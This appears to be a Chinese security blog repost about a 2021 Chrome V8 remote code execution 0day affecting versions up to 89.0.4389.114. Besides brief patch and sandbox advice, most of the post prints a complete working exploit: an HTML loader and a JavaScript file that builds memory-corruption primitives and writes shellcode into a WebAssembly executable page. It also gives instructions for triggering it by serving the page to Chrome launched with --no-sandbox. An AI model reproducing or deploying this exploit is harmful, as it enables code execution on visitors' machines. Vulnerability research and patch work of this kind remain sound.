Chrome 远程代码执行0Day漏洞(20210413)

2021年04月13日,360CERT监测发现国外安全研究员发布了Chrome 远程代码执行 0Day的POC详情.

该漏洞已验证.

漏洞级别

严重;Google:Chrome: <=89.0.4389.114

组件: Chrome

漏洞类型: 命令执行

影响: 服务器接管

简述: 攻击者利用此漏洞,可以构造一个恶意的web页面,当用户访问该页面时,会造成远程代码执行。

目前该漏洞已在最新版本Chrome上得到验证

漏洞修复建议:

通用修补建议

目前Google只针对该漏洞发布了beta测试版Chrome(90.0.4430.70)修复,Chrome正式版(89.0.4389.114)仍存在漏洞,请关注官方Chrome正式版更新,及时修补漏洞。

临时修补建议

强烈建议广大用户在SandBox模式下运行Chrome

POC

https://github.com/r4j0x00/exploits/tree/master/chrome-0day

将以下网页丢到WEB服务里,用待测的chrome访问即可触发。但要注意,运行的chrome要在沙盒sandbox关闭的状态下才能利用成功!

可以在chrom快捷方式属性增加--no-sandbox  也可以在命令行启用chrome 键入:chrome.exe --no-sandbox

exploit.html代码:

<script src="exploit.js"></script>

exploit.js代码:

  1 /*
  2 /*
  3 BSD 2-Clause License
  4 Copyright (c) 2021, rajvardhan agarwal
  5 All rights reserved.
  6 Redistribution and use in source and binary forms, with or without
  7 modification, are permitted provided that the following conditions are met:
  8 1. Redistributions of source code must retain the above copyright notice, this
  9    list of conditions and the following disclaimer.
 10 2. Redistributions in binary form must reproduce the above copyright notice,
 11    this list of conditions and the following disclaimer in the documentation
 12    and/or other materials provided with the distribution.
 13 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
 14 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 15 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 16 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
 17 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 18 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
 19 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
 20 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
 21 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
 22 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 23 */
 24 
 25 var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
 26 var wasm_mod = new WebAssembly.Module(wasm_code);
 27 var wasm_instance = new WebAssembly.Instance(wasm_mod);
 28 var f = wasm_instance.exports.main;
 29 
 30 var buf = new ArrayBuffer(8);
 31 var f64_buf = new Float64Array(buf);
 32 var u64_buf = new Uint32Array(buf);
 33 let buf2 = new ArrayBuffer(0x150);
 34 
 35 function ftoi(val) {
 36     f64_buf[0] = val;
 37     return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
 38 }
 39 
 40 function itof(val) {
 41     u64_buf[0] = Number(val & 0xffffffffn);
 42     u64_buf[1] = Number(val >> 32n);
 43     return f64_buf[0];
 44 }
 45 
 46 const _arr = new Uint32Array([2**31]);
 47 
 48 function foo(a) {
 49     var x = 1;
 50     x = (_arr[0] ^ 0) + 1;
 51 
 52     x = Math.abs(x);
 53     x -= 2147483647;
 54     x = Math.max(x, 0);
 55 
 56     x -= 1;
 57     if(x==-1) x = 0;
 58 
 59     var arr = new Array(x);
 60     arr.shift();
 61     var cor = [1.1, 1.2, 1.3];
 62 
 63     return [arr, cor];
 64 }
 65 
 66 for(var i=0;i<0x3000;++i)
 67     foo(true);
 68 
 69 var x = foo(false);
 70 var arr = x[0];
 71 var cor = x[1];
 72 
 73 const idx = 6;
 74 arr[idx+10] = 0x4242;
 75 
 76 function addrof(k) {
 77     arr[idx+1] = k;
 78     return ftoi(cor[0]) & 0xffffffffn;
 79 }
 80 
 81 function fakeobj(k) {
 82     cor[0] = itof(k);
 83     return arr[idx+1];
 84 }
 85 
 86 var float_array_map = ftoi(cor[3]);
 87 
 88 var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
 89 var fake = fakeobj(addrof(arr2) + 0x20n);
 90 
 91 function arbread(addr) {
 92     if (addr % 2n == 0) {
 93         addr += 1n;
 94     }
 95     arr2[1] = itof((2n << 32n) + addr - 8n);
 96     return (fake[0]);
 97 }
 98 
 99 function arbwrite(addr, val) {
100     if (addr % 2n == 0) {
101         addr += 1n;
102     }
103     arr2[1] = itof((2n << 32n) + addr - 8n);
104     fake[0] = itof(BigInt(val));
105 }
106 
107 function copy_shellcode(addr, shellcode) {
108     let dataview = new DataView(buf2);
109     let buf_addr = addrof(buf2);
110     let backing_store_addr = buf_addr + 0x14n;
111     arbwrite(backing_store_addr, addr);
112 
113     for (let i = 0; i < shellcode.length; i++) {
114         dataview.setUint32(4*i, shellcode[i], true);
115     }
116 }
117 
118 var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
119 console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
120 var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
121 copy_shellcode(rwx_page_addr, shellcode);
122 f();
exploit.js

 

chrome安全考虑默认启动都是在沙盒中,因利用要诱导用户在no-sandbox下访问才能触发漏洞,所以利用又加了一个条件...

为美好的生活奋斗!
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/ethtool/p/14652420.html